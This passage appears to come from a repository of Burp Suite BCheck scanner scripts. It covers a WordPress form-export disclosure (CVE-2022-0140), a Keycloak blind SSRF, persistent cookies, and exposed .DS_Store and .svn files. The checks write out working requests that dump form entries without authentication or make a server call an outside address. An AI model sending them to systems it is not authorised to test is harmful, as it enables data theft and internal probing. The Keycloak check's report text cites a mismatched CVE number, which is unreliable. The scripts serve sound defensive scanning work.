28 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2022-0140.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2022-0140" 4 | description: "CVE-2022-0140 - WordPress Visual Form Builder < 3.0.6 - Unauthenticated Information Disclosure" 5 | author: "Celia S" 6 | tags: "CVE-2022-0140","WordPress" 7 | 8 | define: 9 | potential_path = "/wp-admin/admin.php?page=vfb-export" 10 | 11 | given host then 12 | send request called check: 13 | `POST /wp-admin/admin.php?page=vfb-export HTTP/1.1 14 | Host: {base.request.url.host} 15 | Referer: {base.request.url.host}/wp-admin/admin.php?page=vfb-export 16 | Content-Type: application/x-www-form-urlencoded 17 | Origin: {base.request.url.host} 18 | Content-Length: 116 19 | 20 | vfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File` 21 | 22 | 23 | if {check.response.status_code} is "200" 24 | and {check.response.body} matches "\"Date Submitted\"" 25 | and {check.response.body} matches "\"Entries ID\"" then 26 | 27 | report issue: 28 | severity: info 29 | confidence: certain 30 | detail: `CVE-2022-0140 found at {potential_path}. The plugin does not perform access control on entry form export, allowing unauthenticated users to see the form entries or export it as a CSV File using the vfb-export endpoint.` 31 | remediation: "Upgrade visual-form-builder-plugin. See https://www.fortiguard.com/zeroday/FG-VD-21-082 for details." 32 | end if 33 | -------------------------------------------------------------------------------- /other/tokens/cookie-cached-on-disk.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Cookie cached on disk" 4 | description: "Checks if cookies are cached on disk" 5 | author: "domwhewell-sage" 6 | tags: "passive" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)Set-Cookie:.+(expires=[\w\d\s:,-]+;|max-age=\d+;).*" then 10 | report issue: 11 | severity: info 12 | confidence: certain 13 | detail: "Cookies are set that have an expires or max-age attribute, these are considered persistent cookies and will be stored on disk by the web browser until the expiration time. Check to ensure these are not used to maintain the login session as if an authenticated user does not click the logout button and instead closes the browser, the session will resume when the browser is re-opened. If an attacker has access to the filesystem location where the web browser cache is stored the session cookie could be extracted and used to authenticate the attacker to the web application. If it is a shared machine another user could authenticate themselves just by re-opening the browser." 14 | remediation: "Session management tokens should make use of non-persistent cookies. This forces the session to disappear from the client if the current web browser is closed. Therefore the expires or max-age attribute should be removed from the session cookie. https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html#expire-and-max-age-attributes" 15 | end if 16 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2020-10770 Keycloak request_uri SSRF.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Keycloak before 12.0.1 version - request_uri Blind Server-Side Request Forgery (Unauthenticated)" 4 | description: "Keycloak allows an unauthenticated attacker to send arbitrary values in 'request_uri' parameter and interact with internal network resources which is otherwise not accessible externally. An attacker may use this feature to perform Blind SSRF (Server-side request forgery) attacks on the server." 5 | author: "mrrootsec" 6 | tags: "keycloak", "cve", "ssrf" 7 | 8 | run for each: 9 | potential_path = `/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{generate_collaborator_address()}` 10 | 11 | given host then 12 | send request: 13 | method: `GET` 14 | path: {potential_path} 15 | 16 | if dns interactions then 17 | report issue: 18 | severity: info 19 | confidence: certain 20 | detail: "Vulnerable to CVE-2021-10774 - Keycloak - request_uri Blind Server-Side Request Forgery (SSRF)" 21 | remediation: "Upgrade to the latest version of Keycloak" 22 | end if 23 | 24 | if http interactions then 25 | report issue: 26 | severity: high 27 | confidence: certain 28 | detail: "Vulnerable to CVE-2021-10774 - Keycloak - request_uri Blind Server-Side Request Forgery (SSRF)" 29 | remediation: "Upgrade to the latest version of Keycloak" 30 | end if 31 | -------------------------------------------------------------------------------- /other/files/ds-store-exposed.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: ".DS_Store Configuration Check" 4 | description: "Tests for exposed svn config in current path and at the root directory of site" 5 | author: "j3ssie" 6 | tags: "exposure", "ds_store", "config", "file" 7 | 8 | run for each: 9 | potential_path = ".DS_Store" 10 | 11 | given path then 12 | # replace the potential path with the last path 13 | # like if the path is `/v1/settings/public`. it will be convert to `/v1/settings/{potential_path}` 14 | if not({base.request.url.path} is "/") then 15 | send request called check: 16 | method: "GET" 17 | replacing path: `{regex_replace({regex_replace({base.request.url}, "^.*?\/.*?\/.*?\/", "/")}, "([^/]+)$", "")}{potential_path}` 18 | 19 | end if 20 | 21 | # replace the potential path with entire URI 22 | send request called check1: 23 | method: "GET" 24 | replacing path: `{regex_replace({base.request.url}, "^.*", "")}/{potential_path}` 25 | 26 | if {latest.response.status_code} is "200" and 27 | "Bud1" in {latest.response.body} and 28 | "DSDB" in {latest.response.body} then 29 | if {latest.response.headers} matches "Accept-Ranges: bytes" or 30 | {latest.response.headers} matches "octet-stream" then 31 | report issue: 32 | severity: low 33 | confidence: certain 34 | detail: `.DS_Store configuration found at {potential_path}.` 35 | end if 36 | end if 37 | -------------------------------------------------------------------------------- /other/files/svn-exposed.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "SVN Configuration File Exposed" 4 | description: "Tests for exposed svn config in current path and at the root directory of site" 5 | author: "j3ssie" 6 | tags: "exposure", "svn", "config", "file" 7 | 8 | run for each: 9 | potential_path = ".svn/entries", ".svn/text", ".svn/all-wcprops" 10 | 11 | given path then 12 | if {base.request.url.path} is "/" then 13 | # replace the potential path with entire URI 14 | send request called check: 15 | method: "GET" 16 | replacing path: `{regex_replace({base.request.url}, "^.*", "")}/{potential_path}` 17 | else then 18 | # replace the potential path with the last path 19 | # like if the path is `/v1/settings/public`. it will be convert to `/v1/settings/{potential_path}` 20 | send request called check1: 21 | method: "GET" 22 | replacing path: `{regex_replace({regex_replace({base.request.url}, "^.*?\/.*?\/.*?\/", "/")}, "([^/]+)$", "")}{potential_path}` 23 | end if 24 | 25 | if {latest.response.status_code} is "200" then 26 | if ("END" in {latest.response.body} and 27 | "svn:" in {latest.response.body}) or 28 | ("dir" in {latest.response.body} and 29 | "